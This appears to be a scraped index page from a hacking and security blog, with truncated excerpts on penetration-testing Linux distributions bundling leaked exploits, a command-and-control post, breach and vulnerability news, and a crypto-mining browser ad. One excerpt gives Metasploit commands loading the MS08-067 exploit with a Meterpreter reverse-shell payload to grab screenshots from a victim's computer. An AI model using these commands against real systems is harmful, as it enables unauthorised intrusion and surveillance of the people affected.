Earn Bitcoins just by surfing Online !

Use CryptoTab as your default browser to maximize your revenue Mining speed increases when your browser is active. Use CryptoTab browser for your everyday activities, visit your favorite sites, watch movies online, and take advantage of maximum mining power. Browser with built-in mining CryptoTab Browser includes built-in mining algorithm that allows using your computer resources more effectively than in extension format. It boosts your mining speed up to 8 times and increases BTC earnings. Enhance your browser with over 150 thousand extensions Set up…


Cerberus Linux v1 Subsystem for Windows 10!

Cerberus Linux subsystem is Linux to run on top windows! like the picture bellow^^^ Cerberus linux v1 tools and extras : 15 new Cerberus Frameworks : Metapackages , containers with custom scripts within! Exploits (to analyze): EARLYSHOVEL RedHat 7.0 – 7.1 Sendmail 8.11.x exploit EBBISLAND (EBBSHAVE) root RCE via RPC XDR overflow in Solaris 6, 7, 8, 9 & 10 (possibly newer) both SPARC and x86. ECHOWRECKER remote Samba 3.0.x Linux exploit. EASYBEE appears to be an MDaemon email server vulnerability EASYFUN EasyFun 2.2.0 Exploit for WDaemon…


Black Window 10 v2

  Black Window Enterprise 10 Codename : Polemos Black Window 10 Enterprise is the first windows based penetration testing distribution with Linux integrated ! The system comes activated with a digital license for Windows enterprise! It supports windows apps and Linux apps, GUI and terminal apps! It comes with a tone off hacking tools plus all the tools that are included with the latest release of Cerberus Linux! It has managed to implement Cerberus os within windows. Offers the stability of a windows system…


Cerberus Linux v3

  Cerberus Linux v3  Cerberus is a penetration testing distribution focusing on automation and anonymity , it aims to have the best tools available on the hacking scene tools like Fuzzbunch, Dandespritz, Cobalt strike, Armitage, Metasploit framework and Metasploit community version set up and ready for use!! It includes custom scripts, custom themes, custom icons!Cerberus distribution is based on Debian testing, it has the capability to use 3 repositories to install packages from kali repo,Debian repo, and cyber sec repo! Cerberus is an Angry…


Announcing the Metasploitable3 Community CTF

Been waiting for the Linux version of Metasploitable3 to drop? We’ll do you one better: Metasploit is giving the community a week to rain shells on a penguin-shaped Metasploitable3 instance—and to win prizes at the end of it. Play starts December 4; see below for full competition details. TL;DR: Sign up, drop shells, win stuff. Not into capturing flags but jonesing for a look at the code? We’ll release the Linux Metasploitable3 source code to the community soon after the competition ends. Happy hacking!…


Command and Control – WebSocket

Command and Control – WebSocket December 6, 2017 netbiosXRed TeamC2, Command and Control, Red Team, WebSocketLeave a comment Everyday new methods and tools are being discovered that could be used during red team engagements. Special focus is given into command and control channels that can evade security products and can hide traffic by using non-conventional methods. Arno0x0x discovered that some web gateways doesn’t inspect web socket content. Therefore it could be used as a communication channel for execution of arbitrary commands to hosts. Arno0x0x…


How to install kali linux within windows 10!

Things you need: First, you need to have Windows 10 system then according to Microsoft's instructions to enable   and install WSL and Python 3.0. Python 3.5 WSL-Distribution-Switcher Git Step 1 Once you’re sure you’re using the correct version of Windows 10 Anniversary Update, open the Settings app and head to Update & Security > For Developers. Activate the “Developer Mode” switch here to enable Developer Mode. Next, open the Control Panel, click “Programs,” and click “Turn Windows Features On or Off” under Programs and Features. Enable the…


SAML Post-Intrusion Attack Mirrors ‘Golden Ticket’

Researchers at CyberArk Labs have created a post-intrusion attack technique known as a Golden SAML that could allow an attacker to fake enterprise user identities and forge authentication to gain access to valuable cloud resources in a federation environment. “Using this post-exploit technique, attackers can become any user they want to be – with the highest level of privileges – and gain approved, federated access to a targeted app,” according to CyberArk Labs who revealed the attack technique this week. Related PostsUber Reveals 2016…

New Releases

Cerberus Futuristic Desktop (Kerberos Update)

Cerberus Teaser Cerberus Gnu Debian Linux Cerberus is a penetration testing distribution focusing on automation and anonymity , it aims to have the best tools available on the hacking scene tools like : Fuzzbunch,Dandespritz, Cobalt strike , Armitage , Metasploit framework and metasploit cummunity version set up and ready for use!!It includes custom scripts ,custom themes,custom icons !Cerberus distribution is based on debian testing ,it has the capability to use 3 repositories to install packages from kali repo,debian repo and cybersec repo! Cerberus is…


Uber Reveals 2016 Breach of 57 Million User Accounts

Ride-hailing service Uber Technologies revealed Tuesday that the company suffered a breach of 57 million Uber user accounts in 2016. According to reports, Uber then attempted to cover up the incident by paying $100,000 to attackers to keep the hack a secret and delete the data. The breach and subsequent failure to properly disclose the incident also cost Uber’s chief security officer Joe Sullivan and one of his deputies their jobs. Related PostsCENTCOM Says Massive Data Cache Found on Leaky Server is Benign November…


How to Remotely Grab a Screenshot of Someone’s Compromised Computer

Set Up the Hack First , let's select an exploit to use. Since he's using a Windows Server 2003 system, I like to use the MS08_067_ netapi exploit, so let's type: msf > use exploit/windows/smb/ms08_067_netapi To simplify our screen captures, we'll need to use Metasploit's Meterpreter payload. Let's load it into our exploit by: msf > (ms08_067_netapi) set payload windows/meterpreter/reverse_tcp Next, we need to set our options. At this point, I like to use the "show options" command to see what options are necessary to run…


US-CERT Warns of ASLR Implementation Flaw In Windows

The U.S. Computer Emergency Readiness Team is warning of a vulnerability in Microsoft’s implementation of Address Space Layout Randomization that affects Windows 8, Windows 8.1 and Windows 10. The vulnerability could allow a remote attacker to take control of an affected system. Microsoft said it is investigating the matter. Related PostsMicrosoft Patches 20 Critical Vulnerabilities November 14, 2017 , 5:10 pmGoogle Patches KRACK Vulnerability in Android November 8, 2017 , 10:10 amTor Browser Users Urged to Patch Critical ‘TorMoil’ Vulnerability November 4, 2017 ,…